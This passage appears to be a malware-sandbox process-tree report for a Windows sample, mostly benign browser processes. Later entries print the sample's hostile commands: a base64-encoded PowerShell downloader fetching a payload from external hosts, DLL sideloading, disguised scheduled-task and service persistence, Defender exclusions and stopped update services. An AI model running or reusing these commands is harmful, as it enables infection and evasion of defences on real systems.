    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
    3⤵
    PID:4992
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
    3⤵
    PID:1240
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
    3⤵
    PID:2012
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:5448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:2420
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1888 -parentBuildID 20240401114208 -prefsHandle 1804 -prefMapHandle 1776 -prefsLen 28350 -prefMapSize 244977 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53f43b80-c277-4d64-b222-d86f92e099b6} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" gpu
      4⤵
      PID:764
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2300 -parentBuildID 20240401114208 -prefsHandle 2272 -prefMapHandle 2268 -prefsLen 28350 -prefMapSize 244977 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46ca39d2-765d-4148-b100-6ccafbc4516e} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" socket
      4⤵
      PID:2452
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3112 -childID 1 -isForBrowser -prefsHandle 3284 -prefMapHandle 3104 -prefsLen 28849 -prefMapSize 244977 -jsInitHandle 1100 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c5091dda-4b5e-4128-a2a5-f1b39b55400e} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" tab
      4⤵
      PID:3260
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3756 -childID 2 -isForBrowser -prefsHandle 3424 -prefMapHandle 3252 -prefsLen 34082 -prefMapSize 244977 -jsInitHandle 1100 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53b2c847-1c1b-4983-b81e-335a17f7549f} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" tab
      4⤵
      PID:5816
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4940 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4852 -prefMapHandle 4856 -prefsLen 34082 -prefMapSize 244977 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97f165e7-8329-4f8e-8d9c-1fbbaca59dbc} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" utility
      4⤵
      Checks processor information in registry
      PID:7108
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5036 -childID 3 -isForBrowser -prefsHandle 5032 -prefMapHandle 5028 -prefsLen 27713 -prefMapSize 244977 -jsInitHandle 1100 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9887349a-24d0-4a26-b708-c58a2a9540b4} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" tab
      4⤵
      PID:7128
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5052 -childID 4 -isForBrowser -prefsHandle 5192 -prefMapHandle 5196 -prefsLen 27713 -prefMapSize 244977 -jsInitHandle 1100 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f06d23a5-af2e-4199-b3e9-c92df710aef0} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" tab
      4⤵
      PID:1232
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -childID 5 -isForBrowser -prefsHandle 5376 -prefMapHandle 5384 -prefsLen 27713 -prefMapSize 244977 -jsInitHandle 1100 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88c43d12-3900-4ebb-b5d8-f9c971533a55} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" tab
      4⤵
      PID:6808
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3588 -childID 6 -isForBrowser -prefsHandle 5212 -prefMapHandle 5216 -prefsLen 27820 -prefMapSize 244977 -jsInitHandle 1100 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d692d28-757d-4eab-a925-baa2d129289c} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" tab
      4⤵
      PID:3264
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5048 -childID 7 -isForBrowser -prefsHandle 5164 -prefMapHandle 5588 -prefsLen 27998 -prefMapSize 244977 -jsInitHandle 1100 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53624e98-a449-4bd0-8b93-bd2567a58205} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" tab
      4⤵
      PID:3856
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5168 -childID 8 -isForBrowser -prefsHandle 6420 -prefMapHandle 5656 -prefsLen 27998 -prefMapSize 244977 -jsInitHandle 1100 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df5f49f7-5d3c-40c0-a03c-2a4972f9c56c} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" tab
      4⤵
      PID:1660
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6028 -childID 9 -isForBrowser -prefsHandle 6244 -prefMapHandle 5172 -prefsLen 27998 -prefMapSize 244977 -jsInitHandle 1100 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2ec9299-2347-4a36-9bec-4d2e0746c3a2} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" tab
      4⤵
      PID:6344
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6892 -parentBuildID 20240401114208 -prefsHandle 6872 -prefMapHandle 6876 -prefsLen 34374 -prefMapSize 244977 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2340bd25-fb4d-4a49-9219-3265e6da50cc} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" rdd
      4⤵
      PID:3368
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6900 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 6864 -prefMapHandle 6444 -prefsLen 34374 -prefMapSize 244977 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb937a27-7ddb-4bab-b70f-e08574f8bd4a} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" utility
      4⤵
      Checks processor information in registry
      PID:3700
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7440 -childID 10 -isForBrowser -prefsHandle 7436 -prefMapHandle 7432 -prefsLen 27998 -prefMapSize 244977 -jsInitHandle 1100 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0a0352f-f70f-44b2-8f1d-4242748b5d18} 2420 "\\.\pipe\gecko-crash-server-pipe.2420" tab
      4⤵
      PID:6716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/e119fe767f3d10a387df1951d4b356384c5a9d0441b4034ddf7293c389a410b4/detection
  2⤵
  PID:2008
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ffa70bc46f8,0x7ffa70bc4708,0x7ffa70bc4718
    3⤵
    PID:1492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/e119fe767f3d10a387df1951d4b356384c5a9d0441b4034ddf7293c389a410b4/detection
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:6560
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffa70bc46f8,0x7ffa70bc4708,0x7ffa70bc4718
    3⤵
    PID:2592
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
    3⤵
    PID:6804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
    3⤵
    PID:3960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
    3⤵
    PID:552
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
    3⤵
    PID:3460
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3508 /prefetch:8
    3⤵
    PID:2172
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1
    3⤵
    PID:2568
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
    3⤵
    PID:1056
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4056 /prefetch:8
    3⤵
    PID:5696
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4056 /prefetch:8
    3⤵
    PID:2372
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
    3⤵
    PID:6720
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4228 /prefetch:8
    3⤵
    PID:3404
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4464 /prefetch:1
    3⤵
    PID:652
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
    3⤵
    PID:2356
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
    3⤵
    PID:6188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,4545649684698130843,14318429143043341241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2096 /prefetch:1
    3⤵
    PID:3340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6004
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:6172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6740
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:6632
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:7000
- C:\Users\Admin\Desktop\Google Chrome.exe
  "C:\Users\Admin\Desktop\Google Chrome.exe"
  2⤵
  PID:8044
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\867A.tmp\867B.tmp\867C.bat "C:\Users\Admin\Desktop\Google Chrome.exe""
    3⤵
    PID:5380
- C:\Users\Admin\Desktop\Files\discord.exe
  "C:\Users\Admin\Desktop\Files\discord.exe"
  2⤵
  PID:7400
- C:\Windows\system32\verclsid.exe
  "C:\Windows\system32\verclsid.exe" /S /C {4234D49B-0245-4DF3-B780-3893943456E1} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
  2⤵
  - System Binary Proxy Execution: Verclsid
  PID:2620
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
  2⤵
  PID:852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1792
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:1276

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5456

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3388

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:552

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4732

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:6748
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2352
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:6168
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:7092
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4740
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:6816
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3676
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1456
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:4360
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:6708
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1856
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1656
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5560
- - C:\Windows\System32\sc.exe
    C:\Windows\System32\sc.exe delete "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:7952
- - C:\Windows\System32\sc.exe
    C:\Windows\System32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:8268
- - C:\ProgramData\Google\Chrome\updater.exe
    "C:\ProgramData\Google\Chrome\updater.exe"
    3⤵
    PID:8848
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7916
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:7224
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1072
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:8688
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:6752
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:7616
  - - C:\Windows\system32\powercfg.exe
